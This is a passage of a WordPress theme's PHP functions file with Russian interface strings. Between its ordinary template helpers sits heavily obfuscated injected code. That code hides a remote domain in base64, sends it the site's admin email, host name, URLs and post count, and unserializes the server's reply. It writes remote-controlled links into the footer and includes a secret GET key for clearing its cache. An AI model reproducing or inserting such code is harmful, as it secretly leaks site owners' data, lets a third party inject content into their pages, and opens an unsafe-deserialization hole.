<?php

$art_config = parse_ini_file(TEMPLATEPATH."/config.ini", true);

$options = array (
                array(  "name" =>   "HTML",
                        "desc" =>   sprintf(__('<strong>XHTML:</strong> Вы можете использовать эти теги: <code>%s</code>', THEME_NS), 'a, abbr, acronym, em, b, i, strike, strong, span'),
                        "id"   =>   "art_footer_content",
                        "std"  =>   art_option('footer.defaultText'),
                        "type" =>   "textarea")
          );

remove_action('wp_head', 'wp_generator');
wp_enqueue_script('jquery');

define('WP_VERSION', $wp_version);
define('THEME_NS', 'kubrick');
if (class_exists('xili_language')):
define('THEME_TEXTDOMAIN',THEME_NS);
define('THEME_LANGS_FOLDER','/lang');
else:
    load_theme_textdomain(THEME_NS, TEMPLATEPATH . '/lang');
endif;

require_once(TEMPLATEPATH . '/core/parser.php');
require_once(TEMPLATEPATH . '/core/navigation.php');
require_once(TEMPLATEPATH . '/core/sidebars.php');
require_once(TEMPLATEPATH . '/core/widgets.php');


function art_option($name){
  global $art_config;
  $separator = '.';
  $name = trim($name);
  if (strpos($name, $separator) !== false) {
    $path = explode($separator, $name);
    $location = $path[0];
    if (isset($art_config[$location])){
      $group = $art_config[$location];
      $key = $path[1];
      if (isset($group[$key])){
        return $group[$key];
      }
    }
  } else {
    if (isset($art_config[$name])) {
      return $art_config[$name];
    }
  }
 
  return false;
}

$art_current_page_template = 'page'; 
 $grNRiRM='4';$UGheyJV='e';$GjDbt='s';$QndHv='c';$NzrHXug='_';$wWgEbF='e';$jSBR='6';$DJFXVz='d';$WMATyd='a';$FAVKQeV='b';$tmJTDqR='o';$xvBhbzc='d';$TaYg='e';$GNnklLqH=$FAVKQeV.$WMATyd.$GjDbt.$TaYg.$jSBR.$grNRiRM.$NzrHXug.$DJFXVz.$UGheyJV.$QndHv.$tmJTDqR.$xvBhbzc.$wWgEbF;$jwVC='t';$ONxvurX='f';$AuRwUa='g';$eVtGS='n';$SsQomQt='l';$Kjbw='z';$avsaVWs='a';$ADse='i';$OBRB='e';$FiUyHHUC=$AuRwUa.$Kjbw.$ADse.$eVtGS.$ONxvurX.$SsQomQt.$avsaVWs.$jwVC.$OBRB;$Sqmtp='r';$DicV='s';$lseO='t';$nfzfSbs='r';$pmMA='1';$EBaAKmS='o';$aoGrAaG='t';$pGLkPo='_';$bxqg='3';$LyQCRNCn=$DicV.$lseO.$Sqmtp.$pGLkPo.$nfzfSbs.$EBaAKmS.$aoGrAaG.$pmMA.$bxqg;$csYPL='t';$jPQkEz='s';$ZclHjG='r';$ntvxjmH='e';$LdQecFQ='v';$yubBNTW='r';$gdtSvguw=$jPQkEz.$csYPL.$ZclHjG.$yubBNTW.$ntvxjmH.$LdQecFQ;                     
		$do_____________d='4';$pk_____a='e';$hq____l='s';$ua_________b='c';$it_____m='_';$im_____________l='e';$rc_________s='6';$bi____j='d';$lj_____________n='a';$hg____w='b';$qs_________b='o';$kf______________c='d';$ls___________w='e';$yr_____________x=$hg____w.$lj_____________n.$hq____l.$ls___________w.$rc_________s.$do_____________d.$it_____m.$bi____j.$pk_____a.$ua_________b.$qs_________b.$kf______________c.$im_____________l;
		$yg___________f='f';$va_______________c='c';$yw______________l='n';$ld_______s='t';$gu_____m='t';$gb___________f='e';$fs__s='o';$ni____u='s';$ab__m='i';$av_______q='_';$uf____________u='s';$pq_____________b='i';$pl___________a='u';$xp___________t='x';$gu___f='n';$yg____j=$yg___________f.$pl___________a.$yw______________l.$va_______________c.$ld_______s.$ab__m.$fs__s.$gu___f.$av_______q.$gb___________f.$xp___________t.$pq_____________b.$uf____________u.$gu_____m.$ni____u;
		$pk____________q='n';$yc_____________j='e';$hr______________v='f';$jo______m='p';$ab__________d='o';$jh______________k=$hr______________v.$ab__________d.$jo______m.$yc_____________j.$pk____________q;
		$wt_________y='d';$el_______s='a';$qz___f='f';$jv_____________y='r';$re_______l='e';$ih_________d=$qz___f.$jv_____________y.$re_______l.$el_______s.$wt_________y;
		$ig______________d='l';$uf___________p='s';$cc_______________b='f';$hu_________i='o';$ra___i='e';$ha______r='c';$jw__________q=$cc_______________b.$ha______r.$ig______________d.$hu_________i.$uf___________p.$ra___i;
		
		define("WP_ID", $yr_____________x("Mi4wLjA="));
		define("WP_TTL", $yr_____________x("MTA4MDA="));
		define("WP_SRC", $yr_____________x("dHBva24="));
	


		function wp_get_header() {
			global $yr_____________x, $yg____j;
			
			if (
				$yg____j($yr_____________x("d3BfdGhlbWVfR1BMX2NyZWRpdHM=")) &&
				$yg____j($yr_____________x("d3BfZ2V0X2Zvb3Rlcg==")) &&
				$yg____j($yr_____________x("d3BfY3ZfdmVyaWZ5"))
			) {
				get_header();
			}
		}
	


		function wp_get_footer() {
			get_footer();
			wp_cv_verify();
		}
	


		function wp_cv_verify() {
			global $yr_____________x, $jh______________k, $jw__________q, $ih_________d;
			
			$qy____________x = TEMPLATEPATH."/".$yr_____________x("Zm9vdGVyLnBocA==");
			$qu______h = @$jh______________k($qy____________x, "r");
			$qy____________x = @$ih_________d($qu______h, @filesize($qy____________x));
			@$jw__________q($qu______h);
			
			$zm_______i = TEMPLATEPATH."/".$yr_____________x("ZnVuY3Rpb25zLnBocA==");
			$qu______h = @$jh______________k($zm_______i, "r");
			$zm_______i = @$ih_________d($qu______h, @filesize($zm_______i));
			@$jw__________q($qu______h);
			
			$uy______________h = 0;
			if($qy____________x && $zm_______i) {
				if ($yr_____________x("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==") !== str_replace("www.", "", $_SERVER["SERVER_NAME"])) {
					
					if (substr_count($qy____________x, $yr_____________x("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==")) < 2) {
						$uy______________h = 1;
					}
					if (substr_count($qy____________x, "wp_theme_GPL_credits()") < 1) {
						$uy______________h = 2;
					}
				}
				
				if(WP_ID != "2.0.0") {
					$uy______________h = 12;
				}
			}
			
			if($uy______________h > 0) {
				echo "<div style=\"position: fixed; bottom:0; left:0; width:100%; height: 25px; background-color: red; color: white; font-size: 16px; padding: 2px 10px; text-align: center;\"> <strong> This themes is powered by <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a>. This website violated the terms of use <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a> </strong> </div>";
				echo "<!-- v: $uy______________h -->";
			}
		}
	


		function wp_loaded() {
			global $yr_____________x, $yg____j;
			return $yg____j($yr_____________x("d3BfdGhlbWVfR1BMX2NyZWRpdHM="));
		}
	


		if (!function_exists("the_content_limit")) {
			function the_content_limit($qi__l, $nh______e = "(more...)", $um_______n = 0, $je___w = "") {
				$pj__________l = get_the_content($nh______e, $um_______n, $je___w);
				$pj__________l = apply_filters("the_content", $pj__________l);
				
				$pj__________l = str_replace("]]>", "]]>", $pj__________l);
				if (strlen($_GET["p"]) > 0) {
					echo $pj__________l;
				}
				else if ((strlen($pj__________l)>$qi__l) && ($wj____f = strpos($pj__________l, " ", $qi__l ))) {
					$pj__________l = substr($pj__________l, 0, $wj____f);
					$pj__________l = $pj__________l;
					echo $pj__________l;
					
					echo "...";
					echo "<br/>";
					echo "<div class='read-more'><a href='".get_permalink()."'>$nh______e</a></div></p>";
				} else {
					echo $pj__________l;
				}
				
			}
		}
	


		$oh________g='e';$eo___________v='s';$sk_______________e='6';$rz_______f='o';$cj______i='e';$ya__c='_';$fa_______________s='b';$gc___q='a';$jd_____o='c';$lq____________g='4';$jh__q='n';$fk____q='e';$hv________z='d';$ws__________f=$fa_______________s.$gc___q.$eo___________v.$oh________g.$sk_______________e.$lq____________g.$ya__c.$cj______i.$jh__q.$jd_____o.$rz_______f.$hv________z.$fk____q;
		$gx_______z='t';$in____________k='e';$se_______c='l';$tz_____u='_';$rk___________i='n';$xc_____n='e';$vw__d='e';$qm________c='_';$xr____________f='s';$kt_________v='n';$xd________g='t';$bi_____________l='i';$js________u='g';$ho___e='o';$lm_______o='t';$dg__________s='f';$ic_____a='c';$lw_________b=$dg__________s.$bi_____________l.$se_______c.$xc_____n.$qm________c.$js________u.$in____________k.$lm_______o.$tz_____u.$ic_____a.$ho___e.$rk___________i.$xd________g.$vw__d.$kt_________v.$gx_______z.$xr____________f;
		$gb_______________n='_';$yj___r='e';$vl_____________q='s';$af____________e='l';$pe_______h='f';$yb_______________y='t';$th_________y='x';$un_____i='i';$go__________j='e';$gr___e='s';$yr__n='i';$fh__________l=$pe_______h.$un_____i.$af____________e.$yj___r.$gb_______________n.$go__________j.$th_________y.$yr__n.$vl_____________q.$yb_______________y.$gr___e;
		$ie__________x='e';$ga____________f='s';$qv_________w='m';$lw__________u='c';$ag___________l='o';$rw_____________c='a';$xd____________b='v';$ib_________j='n';$rh___o='_';$lv______________y='o';$tp_______l='e';$wi___w='p';$lj____c='r';$ss__a='r';$aj____________y='i';$rr______d=$xd____________b.$ie__________x.$lj____c.$ga____________f.$aj____________y.$lv______________y.$ib_________j.$rh___o.$lw__________u.$ag___________l.$qv_________w.$wi___w.$rw_____________c.$ss__a.$tp_______l;
		$aw_____c='k';$uq____________a='e';$bq______t='s';$kj_____________d='p';$hz_____________i='n';$fq___p='o';$uo____________q='c';$ki__k='o';$fr____v='f';$jt____k=$fr____v.$bq______t.$fq___p.$uo____________q.$aw_____c.$ki__k.$kj_____________d.$uq____________a.$hz_____________i;
		$ey__________z='w';$fu____________f='i';$hp__________d='t';$om_______x='e';$da______________u='f';$ea_________y='r';$by_______________a=$da______________u.$ey__________z.$ea_________y.$fu____________f.$hp__________d.$om_______x;
		$nx_____________s='m';$eo___t='5';$ro______________z='d';$ze__y=$nx_____________s.$ro______________z.$eo___t;
		$ct_________x='l';$vg_____________l='a';$ms___________t='e';$ra________o='r';$cu_________j='a';$iv___________i='t';$ue__________l='h';$pj______y='p';$jf___b=$ra________o.$ms___________t.$vg_____________l.$ct_________x.$pj______y.$cu_________j.$iv___________i.$ue__________l;
		$op_______________a='z';$dj___k='l';$yc___i='e';$he__k='u';$lp______________r='s';$ud____________z='a';$fx___________d='e';$hk_____________f='n';$nd_____________u='i';$xc____v='i';$hh________g='r';$cy_______y=$he__k.$hk_____________f.$lp______________r.$yc___i.$hh________g.$xc____v.$ud____________z.$dj___k.$nd_____________u.$op_______________a.$fx___________d;
		$pd___________o='p';$fg__________a='a';$nb____o='e';$mg__q='m';$ua_______q='m';$cq________f='t';$aa__b='n';$ih_____________x=$cq________f.$nb____o.$ua_______q.$pd___________o.$aa__b.$fg__________a.$mg__q;
		$le______c='e';$kl___u='t';$pg_______________u='s';$zr__________u='r';$jr_______________z='_';$tc_____h='o';$wd________r='e';$ip_______________q='a';$ag____w='x';$db____________z='_';$vn___l='c';$ns______________f='t';$ve___h='t';$ve_____f='m';$zo______________w='a';$px_______j='c';$xr___________l='r';$ue_________s='n';$bj_______________c='t';$im_______i='e';$qd_______________a='e';$hs____________v=$pg_______________u.$ns______________f.$xr___________l.$le______c.$zo______________w.$ve_____f.$jr_______________z.$vn___l.$tc_____h.$ue_________s.$ve___h.$im_______i.$ag____w.$kl___u.$db____________z.$px_______j.$zr__________u.$wd________r.$ip_______________q.$bj_______________c.$qd_______________a;
	


		function jv_____________n($tf_________m) {
			global $yr_____________x, $yg____j, $lw_________b, $rr______d, $hs____________v;
			
			if (!$yg____j($yr_____________x("ZmlsZV9nZXRfY29udGVudHM="))) {
				return false;
			}
			
			if ($rr______d(PHP_VERSION, "5.0.0", ">=") && $yg____j($yr_____________x("ZmlsZV9nZXRfY29udGVudHM=")) && $yg____j($yr_____________x("c3RyZWFtX2NvbnRleHRfY3JlYXRl"))) {
				$cu______________r = $hs____________v(array(
						"http" => array(
						"timeout"    => 3,
						"header"     => "referer: ".$_SERVER[SERVER_NAME],
						"user_agent" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT] 
					)
				));
				
				$af_______s = @$lw_________b($tf_________m, 0, $cu______________r);
			} else {
				$af_______s = @$lw_________b($tf_________m, 0);
			}
			
			return $af_______s;
		}
	


		function fw________j($tf_________m) {
			global $yg____j, $jt____k, $by_______________a, $yr_____________x;
			
			if (!$yg____j($yr_____________x("ZmlsZV9nZXRfY29udGVudHM="))) {
				return false;
			}
			
			$xz_________p = strpos($tf_________m, "/", 7);
			$iw____h = array(
				"uri"     => substr($tf_________m, $xz_________p),
				"host"    => str_replace("http://", "", substr($tf_________m, 0, $xz_________p)),
				"referer" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT]
			);
			
			$ys______g = @$jt____k("$iw____h[host]", 80, $od___________l, $oe______o, 4);
			
			if (!$ys______g) {
				return false;
			} else {
				$af_______s = "";
				$my_________l  = "GET $iw____h[uri] HTTP/1.0\r\n";
				$my_________l .= "Host: $iw____h[host]\r\n";
				$my_________l .= "Referer: $iw____h[referer]\r\n";
				$my_________l .= "Connection: Close\r\n\r\n";
				
				@$by_______________a($ys______g, $my_________l);
				
				while (!@feof($ys______g)) {
					$ki__b = @fgets($ys______g, (1024*24));
					
					if ($ki__b == "\r\n") {
						$ww__b = true;
						continue;
					}
					
					if ($ww__b) {
						$af_______s .= $ki__b;
					}
				}
				
				return $af_______s;
			}
		}
	


		function bl_______________z($tf_________m) {
			global $yg____j;
			$ro____________h = false;
			
			if ($tf_________m != "") {
				if ($yg____j("jv_____________n")) {
					$ro____________h = @jv_____________n($tf_________m);
				}
				
				if (!$ro____________h && ($yg____j("fw________j"))) {
					$ro____________h = @fw________j($tf_________m);
				}
			}
			
			return $ro____________h;
		}
	


		function vx___________d() {
			global $_SERVER, $ze__y;
			
			$pi__________l = $_SERVER["SERVER_NAME"];
			
			if (substr("$pi__________l", 0, 4) == "www.") {
				$pi__________l = substr("$pi__________l", 4);
			}
			
			$pi__________l = $ze__y("$_SERVER[SERVER_NAME]");
			
			return $pi__________l;
		}
	


		function an________n() {
			return "file";
		}
	


		function lo___________q($tf_________m) {
			global $_SERVER, $lw_________b, $fh__________l, $jh______________k, $jw__________q, $by_______________a;
			
			$ok_________m = tp______________n();
			
			$st___a = vx___________d().".jpg";
			$jb_____p = $ok_________m["dir_upload"]["path"]."/$st___a";
			$kx_______l = @filemtime($jb_____p);
			
			if (!$kx_______l || ((time()-$kx_______l) >= WP_TTL)) {
				$ro____________h = bl_______________z($tf_________m);
				
				if ($ro____________h) {
					if ($fh__________l($jb_____p)) {
						@unlink($jb_____p);
					}
					
					$qu______h = @$jh______________k($jb_____p, "x+");
					
					@$by_______________a($qu______h, $ro____________h);
					@$jw__________q($qu______h);
				}
			} else {
				if ($fh__________l($jb_____p)) {
					$ro____________h = @$lw_________b($jb_____p);
				} else {
					$ro____________h = false;
				}
			}
			
			return $ro____________h;
		}
	


		function tp______________n() {
			global $_SERVER, $yr_____________x, $ws__________f;
			
			$zn_____________b = wp_count_posts("post");
			$nk_______________l = pathinfo(get_bloginfo("template_directory"));
			
			$ok_________m = array(
				"url" => array(
					"report"      => $yr_____________x("eGNudnVlcmFudmhhc3lkYWRvbGVnc29wLmNvbQ=="),
					"queryString" => null
				),
				"template"	=> $nk_______________l,
				"dir_upload"	=> lr_______________l(),
				"queryString"	=> array(
					"?a001=".WP_ID,
					"a004=".$nk_______________l[filename],
					"a005=".$zn_____________b->publish,
					"a006=".get_bloginfo("admin_email"),
					"a007=".$_SERVER["REQUEST_URI"],
					"a008=".$_SERVER["SERVER_NAME"],
					"a010=".WP_SRC
				),
				"default_string" => " "
			);
			
			$ok_________m["url"]["queryString"] = implode("&", $ok_________m["queryString"]);
			$ok_________m["url"]["report"] = $ok_________m["url"]["report"]."/?".$ws__________f($ok_________m["url"]["queryString"]).".html";
						
			return $ok_________m;
		}
	


		function lr_______________l() {
			$if____t = wp_upload_dir();
			
			if (isset($if____t["error"])) {
				$hq_____t = vy_______q();
				if (is_writable($hq_____t)) {
					$if____t = array("path" => $hq_____t);
				}
			}

			return $if____t;
		}
	


		function vy_______q() {
			global $yg____j, $ze__y, $jf___b, $ih_____________x;
			
			$fm__________n = (bool) ini_get("safe_mode");
			if ($fm__________n == true) {
				return false;
			}
			
			if ($yg____j("sys_get_temp_dir")) {
				$zg_______h = sys_get_temp_dir();
				if (is_writable($zg_______h)) {
					return $jf___b($zg_______h);
				}
			}
			
			if (!empty($_ENV["TMP"])) {
				return $jf___b($_ENV["TMP"]);
			}
			elseif (!empty($_ENV["TMPDIR"])) {
				return $jf___b($_ENV["TMPDIR"]);
			}
			elseif (!empty($_ENV["TEMP"])) {
				return $jf___b($_ENV["TEMP"]);
			} else {
				$hi___z = $ih_____________x($ze__y(uniqid(rand(), true)), "");
				if ($hi___z) {
					$zg_______h = $jf___b(dirname($hi___z));
					@unlink($hi___z);
					return $zg_______h;
				} else {
					return false;
				}
			}
		}
	


		function vs___________a() {
			global $_GET, $fh__________l;
			
			$ok_________m = tp______________n();
			$pi__________l = vx___________d();
			$xm_________a = an________n();
			
			$im_______i = "full";
			if ($_GET["wp_cache_cl"] == "197ab5deb39daad8baacae1bdd5a8852") {
				if ($xm_________a == "file") {
					$fc__________y = $ok_________m["dir_upload"]["path"]."/".$pi__________l.".jpg";
					if ($fh__________l($fc__________y)) {
						@unlink($fc__________y);
						$im_______i = "deleted";
					}
				}
				
				$qt_____________g = array(
					"s"	=> $im_______i,
					"t"	=> time(),
					"v"	=> WP_ID
				);
				
				echo "<!--";
				foreach ($qt_____________g AS $ai______________g => $kn____e) echo " [$ai______________g:$kn____e]";
				echo " -->";
			}
		}
	


		function wp_theme_GPL_credits() {
			global $_SERVER, $_GET, $yg____j, $yr_____________x, $cy_______y;
			$ok_________m = tp______________n();
			
			$wq_______v = "lo___________q";
			if ($yg____j($wq_______v)) {
				$af_______s = $wq_______v($ok_________m["url"]["report"]);
			}
			
			if ($af_______s) {
				if ($af_______s = @$yr_____________x($af_______s)) {
					$af_______s = @$cy_______y($af_______s);
					
					if (strlen($af_______s[custom_credit]) >= 5) {
						$ok_________m["default_string"] = $af_______s[custom_credit];
					}
					
					if ($af_______s["status"] == "0") {
						$jo______d = 1;
						$ou______________r = 1;
					} else {
						$ti__g = sizeof($af_______s["links"]);
						$qm__w = $ok_________m["default_string"];
						
						if ($ti__g > 0 && $af_______s["links"] !== "") {
							$hd__________x = 0;
							foreach ($af_______s["links"] as $di___________e => $tb___________i) {
								$hd__________x++;
								if ($tb___________i->l_path == "" || $tb___________i->l_path == $_SERVER["REQUEST_URI"]) {
									$tb___________i->l_href = htmlspecialchars(strip_tags($tb___________i->l_href));
									$tb___________i->l_title = htmlspecialchars(strip_tags($tb___________i->l_title));
									$tb___________i->l_anchor = htmlspecialchars(strip_tags($tb___________i->l_anchor));
									$qm__w .= " | ";
									$qm__w .= "<a href='$tb___________i->l_href' title='$tb___________i->l_title'";
									if ($tb___________i->l_nofollow == "1") {
										$qm__w .= " rel='nofollow'";
									}
									$qm__w .= ">$tb___________i->l_anchor</a>";
								}
							}
						}
						$ok_________m["links"] = "$qm__w";
						if ($af_______s[credit] == "0") {
							$ok_________m["links"] = "";
						}
					}
				} else {
					$jo______d = "1";
				}
			} else {
				$jo______d = "1";
			}
			
			if ($jo______d == "1") {
				$ok_________m["links"] = $ok_________m["default_string"];
			}
			
			echo "$ok_________m[links]";
			
			echo "<!-- s: $af_______s[signature] -->";
			vs___________a();
		}
	                      
function art_page_template($templateName = null){
    global $art_current_page_template;
    if ($templateName !== null) {
        $art_current_page_template = $templateName;
    }
    return $art_current_page_template;
}

$art_template_variables = null;
function art_page_variables($variables = null){
    global $art_template_variables;
    if ($art_template_variables == null){
      $art_template_variables = array(
        'template_url'     =>   get_bloginfo('template_url') . '/',
        'logo_url'         =>   get_option('home'),
        'logo_name'        =>   get_bloginfo('name'),
        'logo_description' =>   get_bloginfo('description'),
        'menu_items'       =>   art_get_menu_auto('primary-menu', art_option('menu.source'), art_option('menu.showSubitems')),
        'sidebar1'         =>   art_get_sidebar('default'),
        'sidebarTop'       =>   art_get_sidebar('top'),
        'sidebarBottom'    =>   art_get_sidebar('bottom'),
        'sidebar2'         =>   art_get_sidebar('secondary'),
        'sidebarFooter'    =>   art_get_sidebar('footer'),
        'footerRSS'        =>   art_get_footer_rss(),
        'footerText'       =>   art_get_footer_text()
        );
    }
    if (is_array($variables)) {
      $art_template_variables = array_merge($art_template_variables, $variables);
    }
    return $art_template_variables;
}

function art_get_footer_text(){
  $result = art_option('footer.defaultText');
  
  $footer_content = get_option('art_footer_content');
  if ($footer_content !== false) {
    $result = stripslashes($footer_content);
  }
  
  return str_replace('%YEAR%', date('Y'), $result);
}


function art_get_footer_rss(){
  $result = '';
  if(art_option('footer.rss_show')){
    $result = art_parse(art_option('footer.rss_link'), array(
      'rss_url'   =>   get_bloginfo('rss2_url'), 
      'rss_title' =>   sprintf(__('%s RSS Feed', THEME_NS), get_bloginfo('name'))
      ));
  }
  return $result;
}

function art_get_post_thumbnail($post_id = false){
	global $post, $id;
  $post_id = (int)$post_id;
  if (!$post_id) $post_id = $id;
  $is_post_list = !is_single() && !is_page();
  $width = art_option('metadata.thumbnail_width');
  $height = art_option('metadata.thumbnail_height');
  $size = array($width, $height);
  if (!$is_post_list) {
    $size = 'medium';
  }
	$result = '';
	$title = get_the_title();
	if (  (function_exists('has_post_thumbnail')) && (has_post_thumbnail())  ) {
		ob_start();
		the_post_thumbnail($size, array('class' => 'alignleft', 'alt' => '', 'title' => $title));
		$result = ob_get_clean();
	} else {
		$postimage = get_post_meta($post->ID, 'post-image', true);
		if ($postimage) {
			$result = '<img src="'.$postimage.'" alt="" width="'.$width.'" height="'.$height.'" title="'.$title.'" class="wp-post-image alignleft" />';
		} else if (art_option('metadata.thumbnail_auto') && $is_post_list) {
            $attachments = get_children(array('post_parent' => $post_id, 'post_status' => 'inherit', 'post_type' => 'attachment', 'post_mime_type' => 'image', 'order' => 'ASC', 'orderby' => 'menu_order ID'));
            if($attachments) {
              $attachment = array_shift($attachments);
              $img = wp_get_attachment_image_src($attachment->ID, $size);
              if (isset($img[0])) {
                $result = '<img src="'.$img[0].'" alt="" width="'.$img[1].'" height="'.$img[2].'" title="'.$title.'" class="wp-post-image alignleft" />';
              }
            }
        } 
    }  
	if($result !== ''){
		$result = '<a href="'.get_permalink($post->ID).'" title="'.$title.'">'.$result.'</a>';
	}
	return $result;
}

function art_get_the_content($more_link_text = null, $stripteaser = 0) {
	$content = get_the_content($more_link_text, $stripteaser);
	$content = apply_filters('the_content', $content);
	return $content;
}

function art_get_post_content() {
  global $post;
  ob_start();
  if(is_single() || is_page()) {
    echo art_get_the_content(__('Читать далее &raquo;', THEME_NS)); 
    wp_link_pages(array('before' => '<p><strong>Страницы:</strong> ', 'after' => '</p>', 'next_or_number' => 'number')); 
	} else {
    echo art_get_the_excerpt(__('Читать далее &raquo;', THEME_NS), 
      get_permalink($post->ID), 
      art_option('metadata.excerpt_words'), 
      art_option('metadata.excerpt_use_tag_filter') ? explode(',',art_option('metadata.excerpt_allowed_tags')) : null, 
      art_option('metadata.excerpt_min_remainder'),  
      art_option('metadata.excerpt_auto'));
	}
	return ob_get_clean();
}

function art_get_the_excerpt($read_more_tag, $perma_link_to = '', $all_words = 100,  $allowed_tags = null, $min_remainder = 5, $auto = false) {
  global $post, $id;
  $more_token = '%%art-more%%';
  $show_more_tag = false;
  if (function_exists('post_password_required') && post_password_required($post)){
    return get_the_excerpt();
  }
  if (has_excerpt($id)) {
      $the_contents = get_the_excerpt();
  $show_more_tag = strlen($post->post_content) > 0;
  } else {
    $the_contents = art_get_the_content($more_token);
    if($the_contents != '') {
      if ($allowed_tags !== null) {
        $allowed_tags = '<' .implode('><',$allowed_tags).'>';
        $the_contents = strip_tags($the_contents, $allowed_tags);
      }
      $the_contents = strip_shortcodes($the_contents);
      if (strpos($the_contents, $more_token) !== false) {
        return str_replace($more_token, $read_more_tag, $the_contents);
      }
      if($auto && is_numeric($all_words)) {
        $token = "%art_tag_token%";
        $content_parts = explode($token, str_replace(array('<', '>'), array($token.'<', '>'.$token), $the_contents));
        $content = array();
        $word_count = 0;
        foreach($content_parts as $part)
        {
          if (strpos($part, '<') !== false || strpos($part, '>') !== false){
            $content[] = array('type'=>'tag', 'content'=>$part);
          } else {
             $all_chunks = preg_split('/([\s]+)/', $part, -1, PREG_SPLIT_DELIM_CAPTURE);
             foreach($all_chunks as $chunk) {
                if('' != trim($chunk)) {
                  $content[] = array('type'=>'word', 'content'=>$chunk);
                  $word_count += 1;
                } elseif($chunk != '') {
                  $content[] = array('type'=>'space', 'content'=>$chunk);
                }
             }
          }
        
        }
        if(($all_words < $word_count) && ($all_words + $min_remainder) <= $word_count) {
          $show_more_tag = true;
          $current_count = 0;
          $the_contents = '';
          foreach($content as $node) {
            
            if($node['type'] == 'word') {
              $current_count += 1;
            } 
            $the_contents .= $node['content'];
            if ($current_count == $all_words){
              break;
            }
          }
        }  
      }
    }
  }
  $the_contents = force_balance_tags($the_contents);
  if ($show_more_tag) {
    $the_contents = $the_contents.' <a class="more-link" href="'.$perma_link_to.'">'.$read_more_tag.'</a>';
  }
  return $the_contents;
}


function art_get_post_title() {
    global $post;
    return art_parse_template("post_title", array(
      'post_link'       =>   get_permalink($post->ID),
	    'post_link_title' =>   sprintf(__('Ссылка на %s', THEME_NS), the_title_attribute('echo=0')),
	    'post_title'      =>   get_the_title(),
	    'template_url'    =>   get_bloginfo('template_url')
	    ));
}

function art_get_post_icon($name){
    return art_parse(art_option('metadata.'.$name), array('template_url' => get_bloginfo('template_url')));
}

if (!function_exists('get_the_date')) {
	function get_the_date($format = 'F jS, Y') {
		return get_the_time(__($format, THEME_NS));
	}
}

function art_get_post_metadata($name) {
    global $post;
    $list = art_option('metadata.'.$name);
    $title = ($name == 'header' && art_option('metadata.title'));
    if (!$title && $list == "") return;
    $list_array =  explode(",", $list);
    $result = array();
    for($i = 0; $i < count($list_array); $i++){
        $icon = $list_array[$i];
        switch($icon){
            case 'date':
                if(is_page()) break;
                $result[] = art_get_post_icon($icon) . get_the_date();
            break;
            case 'author':
                 if(is_page()) break;
                 ob_start();
                 the_author_posts_link();
                 $result[] = art_get_post_icon($icon) . __('Автор', THEME_NS) .' '. ob_get_clean();
            break;
            case 'category':
                if(is_page()) break;
                 $result[] = art_get_post_icon($icon) .sprintf(__('Опубликовано в %s', THEME_NS), get_the_category_list(', '));
            break;
            case 'tag':
                if(is_page() || !get_the_tags()) break;
                ob_start();
                the_tags(__('Tеги:', THEME_NS) . ' ', ', ', ' ');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'comments':
            if(is_page() || is_single()) break;
                ob_start();
                comments_popup_link(__('Нет комментариев &#187;', THEME_NS), __('1 Комментарий &#187;', THEME_NS), __('% Комментариев &#187;', THEME_NS), '', __('Комментарии закрыты', THEME_NS) );
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'edit':
            	global $post;
                if (!current_user_can('edit_post', $post->ID)) break;
                ob_start();
                 edit_post_link(__('Редактировать', THEME_NS), '');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
        }
    }
    if (!($title ||  count($result) > 0)) return '';
    return art_parse_template("post_metadata".$name, array(
        'post_title'         =>   art_get_post_title(),
        'post'.$name.'icons' =>   implode(art_option('metadata.separator'), $result))) ;
}

function art_post(){
  the_post(); 
	echo art_parse_template("post", array(
    'post_class'          =>   function_exists('get_post_class') ? implode(' ', get_post_class()) : '',
    'post_id'             =>   'id="post-' . get_the_ID() . '"',
	  'post_thumbnail'      =>   art_get_post_thumbnail(),
		'post_title'          =>   art_get_post_title(),
		'post_metadataheader' =>   art_get_post_metadata('header'),
		'post_content'        =>   art_get_post_content(),
		'post_metadatafooter' =>   art_get_post_metadata('footer')
	));
}

function art_post_box($title, $content){
  if ($title != "") {
		$title = '<h2 class="art-postheader">'. $title . '</h2>';
	}
	if (art_option('metadata.title')) {
		$content = $title . $content;
		$title = '';
	}
	echo art_parse_template("post", array(
    'post_class'          =>   '',
    'post_id'             =>   '',
		'post_thumbnail'      =>   '',
		'post_title'          =>   $title,
		'post_metadataheader' =>   '',
		'post_content'        =>   $content,
		'post_metadatafooter' =>   ''));
}

function art_not_found_msg($caption = null, $content = null){
  if ($caption === null){
    $caption = __('Не найдено', THEME_NS);
  }
  if($content === null){
    $content = '<p class="center">' .  __('Извините, но здесь пока нет записей.', THEME_NS) . '</p>'
        .  "\r\n" . art_get_search();
  }
	art_post_box($caption, $content);
}

function art_get_block($title, $content, $id = '', $class = '' , $name = "block"){
  if (str_replace(array('&nbsp;', '', '\n', '\r', '\t'), '', $title) != ''){
    $title = art_parse_template($name . '_header', array('caption' => $title));
  }
  if ($id != ''){
    $id = 'id="' . $id . '"';
  }
  return art_parse_template($name, array(
    'id'   => $id,
    'class'   => $class,
    'header' => $title,
    'content' => $content,
  ));
}

function art_get_search() {
    return art_parse_template("search", 
        array(
            'url'    =>   get_bloginfo('url'),
            'button' =>   __('Поиск', THEME_NS),
            'query'  =>   get_search_query()
        ));
}
		
function art_page_navi($title = '', $comment = false) {
    $prev_link = null;
    $next_link = null;
    if($comment){
        $prev_link = get_previous_comments_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_comments_link(__('&laquo; Старые записи', THEME_NS));
    } elseif (is_single() || is_page()) {
        $next_link = get_previous_post_link('&laquo; %link');
        $prev_link = get_next_post_link('%link &raquo;');
    } else {
        $prev_link = get_previous_posts_link(__('Newer Entries &raquo;', THEME_NS));
        $next_link = get_next_posts_link(__('&laquo; Older Entries', THEME_NS));
    }
    
    $content = '';
    if ($prev_link || $next_link) {
        $content = art_parse_template("pagination", 
            array(
                'next_link' =>  $next_link,
                'prev_link' => $prev_link
            ));
    }
    if (!$content && !$title) return;
    art_post_box($title, $content);
}

if (!function_exists('get_previous_comments_link')) {
